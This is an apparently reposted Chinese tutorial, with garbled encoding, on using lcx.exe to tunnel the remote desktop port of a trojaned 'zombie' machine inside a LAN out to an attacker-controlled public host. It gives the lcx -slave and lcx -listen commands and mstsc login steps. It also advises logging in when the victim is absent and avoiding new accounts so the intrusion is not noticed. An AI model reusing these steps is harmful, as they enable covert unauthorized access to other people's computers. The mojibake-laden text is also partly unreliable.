資源描述:
《LCX轉(zhuǎn)發(fā)內(nèi)網(wǎng)端口》由會(huì)員上傳分享��,免費(fèi)在線閱讀�����,更多相關(guān)內(nèi)容在教育資源-天天文庫(kù)��。
1、在理論上只要網(wǎng)絡(luò)連接的計(jì)算機(jī)都是可以訪問(wèn)的�,但是在實(shí)際中往往由于技術(shù)水平等原因,很難實(shí)現(xiàn)它;例如局域網(wǎng)中的某臺(tái)計(jì)算機(jī)僅僅開(kāi)放了Web服務(wù)���,該服務(wù)僅能供內(nèi)網(wǎng)用戶(hù)使用�����,而外網(wǎng)用戶(hù)根本沒(méi)有辦法直接訪問(wèn)���。因此要想讓外網(wǎng)用戶(hù)能夠訪問(wèn)局域網(wǎng)中的系統(tǒng)服務(wù),這必須進(jìn)行端口映射等操作才行�����。端口映射在入侵內(nèi)網(wǎng)的時(shí)候經(jīng)常用到����,特別是要登陸遠(yuǎn)程終端服務(wù)時(shí),使用端口映射就非常方便��?�! cx.exe是一個(gè)端口轉(zhuǎn)發(fā)工具����,相當(dāng)于把肉雞A上的3389端口轉(zhuǎn)發(fā)到具有外網(wǎng)IP地址的B機(jī)上�,這樣連接B機(jī)的3389端口就相當(dāng)于鏈接A機(jī)的3389端口�。Lcx程序多用于被控制計(jì)算機(jī)(
2、肉雞)處于內(nèi)網(wǎng)的情況���,被控制機(jī)可能中了木馬程序��,雖然能夠進(jìn)行控制����,但還是沒(méi)有使用遠(yuǎn)程終端登陸到本機(jī)進(jìn)行管理方便��,因此在很多情況下�����,都會(huì)想方設(shè)法在被控制計(jì)算機(jī)上開(kāi)啟3389端口�����,然后通過(guò)lcx等程序進(jìn)行端口轉(zhuǎn)發(fā)���,進(jìn)而在本地連接到被控制計(jì)算機(jī)的遠(yuǎn)程終端并進(jìn)行管理和使用。 1確定被控制計(jì)算機(jī)的IP地址 在被控制計(jì)算機(jī)上開(kāi)啟遠(yuǎn)程終端���,然后執(zhí)行“ipconfig/all”命令���,查看其網(wǎng)絡(luò)配置情況,如圖1所示���,該計(jì)算機(jī)的ip地址為“192.168.80.129” 圖1確定被控制計(jì)算機(jī)的IP地址 2在被控制計(jì)算機(jī)上執(zhí)行端口轉(zhuǎn)發(fā)命令 在被控制
3����、計(jì)算機(jī)上執(zhí)行“l(fā)cx–slave218.69.*.*51192.168.80.1293389”���,如圖2所示����,執(zhí)行完畢后會(huì)給出一些提示����,如果顯示為“MakeaConnectionto218.69.*.*:51”則表示端口轉(zhuǎn)發(fā)正確?��! D2在被控制計(jì)算機(jī)上執(zhí)行轉(zhuǎn)發(fā)命令 說(shuō)明 lcx一共有三條命令��,第一條命令(lcx–lister513389)是在具有外網(wǎng)獨(dú)立IP的計(jì)算機(jī)上執(zhí)行�,表示在本機(jī)上監(jiān)聽(tīng)51端口,該端口主要是接受被控制計(jì)算機(jī)3389端口轉(zhuǎn)發(fā)過(guò)來(lái)的數(shù)據(jù)�����。第二條命令(lcx–slave218.69.*.*51192.168.80.12
4����、93389)表示將本機(jī)IP地址為192.168.80.129的3389端口轉(zhuǎn)發(fā)到遠(yuǎn)程地址為“218.69.*.*”的51端口。第三條命令是端口轉(zhuǎn)向��?! ?在本機(jī)上執(zhí)行監(jiān)聽(tīng)命令 在本機(jī)上打開(kāi)DOS命令提示符,然后到lcx.exe程序所在路徑執(zhí)行“l(fā)cx–lister513389”命令���,監(jiān)聽(tīng)51端口���,監(jiān)聽(tīng)成功后,會(huì)顯示如圖3所示的數(shù)據(jù)��?���! D3在本機(jī)上監(jiān)聽(tīng)51端口 注意 (1)在本機(jī)上監(jiān)聽(tīng)的端口必須是未使用的端口,可以使用“netstat-an
5����、find"51"”命令進(jìn)行查看,如果沒(méi)有顯示結(jié)果則表示51端口可以用來(lái)進(jìn)行監(jiān)聽(tīng)���?�! ?2)
6���、被控制計(jì)算機(jī)與本機(jī)成功建立連接后會(huì)不停的顯示連接數(shù)據(jù),如圖4所示�����,如果未出現(xiàn)數(shù)據(jù)發(fā)送和接受的情況�����,說(shuō)明連接建立不成功�。 圖4成功建立連接 4在本機(jī)使用遠(yuǎn)程終端進(jìn)行登錄 在DOS提示符下輸入“mstsc”命令打開(kāi)遠(yuǎn)程終端連接器�����,輸入“127.0.0.1”后單擊“連接”按鈕進(jìn)行遠(yuǎn)程終端連接,在出現(xiàn)登錄界面后分別收入用戶(hù)名和密碼��,驗(yàn)證通過(guò)后�,即可遠(yuǎn)程進(jìn)入被控制計(jì)算機(jī)的桌面,如圖5所示���,輸入“ipconfig/all”以及“netuser”命令來(lái)查看網(wǎng)絡(luò)配置情況以及用戶(hù)信息��?���! D5遠(yuǎn)程登入被控制計(jì)算機(jī) 注意 (1)如果被控制計(jì)算
7�����、機(jī)是服務(wù)器�����,則在登陸時(shí)可以直接進(jìn)行登陸;如果被控制計(jì)算機(jī)是WindowsXP系統(tǒng)�����,則最好選擇用戶(hù)不在計(jì)算機(jī)的時(shí)間進(jìn)行登陸��,否則容易被發(fā)現(xiàn)?! ?2)不要輕易在被控制計(jì)算機(jī)上建立賬號(hào)����,尤其是WindowsXP,建立帳號(hào)后���,會(huì)立即在登陸界面中進(jìn)行顯示���。 5查看本地連接 在被控制計(jì)算機(jī)上使用“netstat-an”查看當(dāng)前所有的連接時(shí)���,可以看到被控制計(jì)算機(jī)時(shí)在跟自己進(jìn)行遠(yuǎn)程終端連接��,如圖6所示���,而實(shí)際的3389端口是跟本機(jī)的51端口進(jìn)行連接的?�! D6查看實(shí)際網(wǎng)絡(luò)連接 本案例通過(guò)使用lcx端口轉(zhuǎn)發(fā)程序����,成功的在本機(jī)連入被控制計(jì)算機(jī)的內(nèi)網(wǎng)
8����、��,可以很方便的對(duì)該計(jì)算機(jī)進(jìn)行遠(yuǎn)程管理��,在進(jìn)行內(nèi)網(wǎng)滲透時(shí)尤為有用
